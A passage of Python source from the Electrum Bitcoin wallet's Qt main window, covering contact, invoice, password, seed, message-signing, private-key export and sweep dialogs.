toolbar_shown = bool(self.config.get('show_toolbar_addresses', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = UTXOList(self)
return self.create_list_tab(self.utxo_list)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if not self.question(_("Do you want to remove {} from your wallet?").format(addr)):
return
try:
self.wallet.delete_address(addr)
except UserFacingException as e:
self.show_error(str(e))
else:
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_onchain_invoice(self, invoice: OnchainInvoice):
amount_str = self.format_amount(invoice.amount_sat) + ' ' + self.base_unit()
d = WindowModalDialog(self, _("Onchain Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
grid.addWidget(QLabel(amount_str), 1, 1)
if len(invoice.outputs) == 1:
grid.addWidget(QLabel(_("Address") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.get_address()), 2, 1)
else:
            outputs_str = '\n'.join(map(lambda x: x.address + ' : ' + self.format_amount(x.value) + ' ' + self.base_unit(), invoice.outputs))
grid.addWidget(QLabel(_("Outputs") + ':'), 2, 0)
grid.addWidget(QLabel(outputs_str), 2, 1)
grid.addWidget(QLabel(_("Description") + ':'), 3, 0)
grid.addWidget(QLabel(invoice.message), 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.exp + invoice.time)), 4, 1)
if invoice.bip70:
pr = paymentrequest.PaymentRequest(bytes.fromhex(invoice.bip70))
pr.verify(self.contacts)
grid.addWidget(QLabel(_("Requestor") + ':'), 5, 0)
grid.addWidget(QLabel(pr.get_requestor()), 5, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 6, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 6, 1)
def do_export():
key = pr.get_id()
name = str(key) + '.bip70'
fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70")
if not fn:
return
                with open(fn, 'wb') as f:
                    f.write(pr.raw)
                self.show_message(_('BIP70 invoice saved as') + ' ' + fn)
exportButton = EnterButton(_('Export'), do_export)
buttons = Buttons(exportButton, CloseButton(d))
else:
buttons = Buttons(CloseButton(d))
vbox.addLayout(grid)
vbox.addLayout(buttons)
d.exec_()
def show_lightning_invoice(self, invoice: LNInvoice):
lnaddr = lndecode(invoice.invoice, expected_hrp=constants.net.SEGWIT_HRP)
d = WindowModalDialog(self, _("Lightning Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Node ID") + ':'), 0, 0)
grid.addWidget(QLabel(lnaddr.pubkey.serialize().hex()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
amount_str = self.format_amount(invoice.get_amount_sat()) + ' ' + self.base_unit()
grid.addWidget(QLabel(amount_str), 1, 1)
grid.addWidget(QLabel(_("Description") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.message), 2, 1)
grid.addWidget(QLabel(_("Hash") + ':'), 3, 0)
grid.addWidget(QLabel(lnaddr.paymenthash.hex()), 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.time + invoice.exp)), 4, 1)
vbox.addLayout(grid)
invoice_e = ShowQRTextEdit()
invoice_e.addCopyButton(self.app)
invoice_e.setText(invoice.invoice)
vbox.addWidget(invoice_e)
vbox.addLayout(Buttons(CloseButton(d),))
d.exec_()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.wallet.db.get("qt-console-history", [])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
'lnutil': lnutil,
})
c = commands.Commands(config=self.config,
network=self.network,
callback=lambda: self.console.set_json(True))
methods = {}
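        # Expose each Commands method in the console namespace, bound to this
        # window's wallet and able to prompt for the password when needed.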
def mkfunc(f, method):
return lambda *args, **kwargs: f(method,
args,
self.password_dialog,
**{**kwargs, 'wallet': self.wallet})
for m in dir(c):
            if m[0] == '_' or m in ['network', 'wallet', 'config']:
                continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
        self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog)
        sb.addPermanentWidget(self.password_button)
        sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog))
        self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog)
sb.addPermanentWidget(self.seed_button)
self.lightning_button = None
if self.wallet.has_lightning() and self.network:
self.lightning_button = StatusBarButton(read_QIcon("lightning_disconnected.png"), _("Lightning Network"), self.gui_object.show_lightning_dialog)
self.update_lightning_icon()
sb.addPermanentWidget(self.lightning_button)
self.status_button = None
if self.network:
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), self.gui_object.show_network_dialog)
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def create_coincontrol_statusbar(self):
self.coincontrol_sb = sb = QStatusBar()
sb.setSizeGripEnabled(False)
#sb.setFixedHeight(3 * char_width_in_lineedit())
sb.setStyleSheet('QStatusBar::item {border: None;} '
+ ColorScheme.GREEN.as_stylesheet(True))
self.coincontrol_label = QLabel()
self.coincontrol_label.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
self.coincontrol_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
sb.addWidget(self.coincontrol_label)
clear_cc_button = EnterButton(_('Reset'), lambda: self.utxo_list.set_spend_list(None))
clear_cc_button.setStyleSheet("margin-right: 5px;")
sb.addPermanentWidget(clear_cc_button)
sb.setVisible(False)
return sb
def set_coincontrol_msg(self, msg: Optional[str]) -> None:
if not msg:
self.coincontrol_label.setText("")
self.coincontrol_sb.setVisible(False)
return
self.coincontrol_label.setText(msg)
self.coincontrol_sb.setVisible(True)
def update_lightning_icon(self):
if self.lightning_button is None:
return
if self.network.lngossip is None:
return
# display colorful lightning icon to signal connection
self.lightning_button.setIcon(read_QIcon("lightning.png"))
cur, total, progress_percent = self.network.lngossip.get_sync_progress_estimate()
# self.logger.debug(f"updating lngossip sync progress estimate: cur={cur}, total={total}")
progress_str = "??%"
if progress_percent is not None:
progress_str = f"{progress_percent}%"
if progress_percent and progress_percent >= 100:
self.lightning_button.setMaximumWidth(25)
self.lightning_button.setText('')
self.lightning_button.setToolTip(_("The Lightning Network graph is fully synced."))
else:
self.lightning_button.setMaximumWidth(25 + 4 * char_width_in_lineedit())
self.lightning_button.setText(progress_str)
self.lightning_button.setToolTip(_("The Lightning Network graph is syncing...\n"
"Payments are more likely to succeed with a more complete graph."))
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
def change_password_dialog(self):
from electrum.storage import StorageEncryptionVersion
if self.wallet.get_available_storage_encryption_version() == StorageEncryptionVersion.XPUB_PASSWORD:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(repr(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_storage=encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_wallet_info(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
vbox = QVBoxLayout()
wallet_type = self.wallet.db.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
# lightning
grid.addWidget(QLabel(_('Lightning') + ':'), 5, 0)
if self.wallet.can_have_lightning():
grid.addWidget(QLabel(_('Enabled')), 5, 1)
local_nodeid = QLabel(bh2u(self.wallet.lnworker.node_keypair.pubkey))
local_nodeid.setTextInteractionFlags(Qt.TextSelectableByMouse)
grid.addWidget(QLabel(_('Lightning Node ID:')), 6, 0)
grid.addWidget(local_nodeid, 6, 1, 1, 3)
else:
grid.addWidget(QLabel(_("Not available for this wallet.")), 5, 1)
grid.addWidget(HelpButton(_("Lightning is currently restricted to HD wallets with p2wpkh addresses.")), 5, 2)
vbox.addLayout(grid)
labels_clayout = None
if self.wallet.is_deterministic():
keystores = self.wallet.get_keystores()
ks_stack = QStackedWidget()
def select_ks(index):
ks_stack.setCurrentIndex(index)
# only show the combobox in case multiple accounts are available
if len(keystores) > 1:
def label(idx, ks):
if isinstance(self.wallet, Multisig_Wallet) and hasattr(ks, 'label'):
return _("cosigner") + f' {idx+1}: {ks.get_type_text()} {ks.label}'
else:
return _("keystore") + f' {idx+1}'
labels = [label(idx, ks) for idx, ks in enumerate(self.wallet.get_keystores())]
on_click = lambda clayout: select_ks(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Select keystore"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
for ks in keystores:
ks_w = QWidget()
ks_vbox = QVBoxLayout()
ks_vbox.setContentsMargins(0, 0, 0, 0)
ks_w.setLayout(ks_vbox)
mpk_text = ShowQRTextEdit(ks.get_master_public_key())
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
run_hook('show_xpub_button', mpk_text, ks)
der_path_hbox = QHBoxLayout()
der_path_hbox.setContentsMargins(0, 0, 0, 0)
der_path_hbox.addWidget(QLabel(_("Derivation path") + ':'))
der_path_text = QLabel(ks.get_derivation_prefix() or _("unknown"))
der_path_text.setTextInteractionFlags(Qt.TextSelectableByMouse)
der_path_hbox.addWidget(der_path_text)
der_path_hbox.addStretch()
ks_vbox.addWidget(QLabel(_("Master Public Key")))
ks_vbox.addWidget(mpk_text)
ks_vbox.addLayout(der_path_hbox)
ks_stack.addWidget(ks_w)
select_ks(0)
vbox.addWidget(ks_stack)
vbox.addStretch(1)
btn_export_info = run_hook('wallet_info_buttons', self, dialog)
btn_close = CloseButton(dialog)
btns = Buttons(btn_export_info, btn_close)
vbox.addLayout(btns)
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(repr(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
    def show_qrcode(self, data, title=_("QR code"), parent=None, *,
help_text=None, show_copy_text_btn=False):
if not data:
return
d = QRDialog(data, parent or self, title, help_text=help_text,
show_copy_text_btn=show_copy_text_btn)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(repr(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
# if redeem_script:
# vbox.addWidget(QLabel(_("Redeem Script") + ':'))
# rds_e = ShowQRTextEdit(text=redeem_script)
# rds_e.addCopyButton(self.app)
# vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, data: Union[str, bytes]) -> Union[None, 'PartialTransaction', 'Transaction']:
from electrum.transaction import tx_from_any
try:
return tx_from_any(data)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + repr(e))
return
def import_channel_backup(self, encrypted: str):
if not self.question('Import channel backup?'):
return
try:
self.wallet.lnbackups.import_channel_backup(encrypted)
except Exception as e:
self.show_error("failed to import backup" + '\n' + str(e))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(repr(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if str(data).startswith("bitcoin:"):
self.pay_to_URI(data)
return
if data.startswith('channel_backup:'):
self.import_channel_backup(data)
return
# else if the user scanned an offline signed tx
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self) -> Optional[Transaction]:
fileName = self.getOpenFileName(_("Select your transaction file"),
TRANSACTION_FILE_EXTENSION_FILTER_ANY)
if not fileName:
return
try:
with open(fileName, "rb") as f:
file_content = f.read() # type: Union[str, bytes]
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason),
title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_text_channel_backup(self):
text = text_dialog(self, _('Input channel backup'), _("Channel Backup:"), _("Load backup"))
if not text:
return
if text.startswith('channel_backup:'):
self.import_channel_backup(text)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except UntrustedServerReturnedError as e:
self.logger.info(f"Error getting transaction from network: {repr(e)}")
self.show_message(_("Error getting transaction from network") + ":\n" + e.get_message_for_gui())
return
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + repr(e))
return
else:
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(repr(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
os.chmod(fileName, 0o600)
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
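# Illustrative note (not in the original source): with is_csv=True the file written
# above has one "address,private_key" header row followed by rows like
# "bc1q...,p2wpkh:L1aW4a..." (the WIF shown here is a made-up placeholder);
# otherwise the same address->key mapping is dumped as indented JSON.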
def do_import_labels(self):
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), self.wallet.import_labels, on_import)
def do_export_labels(self):
export_meta_gui(self, _('labels'), self.wallet.export_labels)
def import_invoices(self):
import_meta_gui(self, _('invoices'), self.wallet.import_invoices, self.invoice_list.update)
def export_invoices(self):
export_meta_gui(self, _('invoices'), self.wallet.export_invoices)
def import_requests(self):
import_meta_gui(self, _('requests'), self.wallet.import_requests, self.request_list.update)
def export_requests(self):
export_meta_gui(self, _('requests'), self.wallet.export_requests)
def import_contacts(self):
import_meta_gui(self, _('contacts'), self.contacts.import_file, self.contact_list.update)
def export_contacts(self):
export_meta_gui(self, _('contacts'), self.contacts.export_file)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {repr(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address_for_corruption(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
privkeys = get_pk()
def on_success(result):
coins, keypairs = result
outputs = [PartialTxOutput.from_address_and_value(addr, value='!')]
self.warn_if_watching_only()
self.pay_onchain_dialog(coins, outputs, external_keypairs=keypairs)
def on_failure(exc_info):
self.on_error(exc_info)
msg = _('Preparing sweep transaction...')
task = lambda: self.network.run_from_another_thread(
sweep_preparations(privkeys, self.network))
WaitingDialog(self, msg, task, on_success, on_failure)
def _do_import(self, title, header_layout, func):
text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
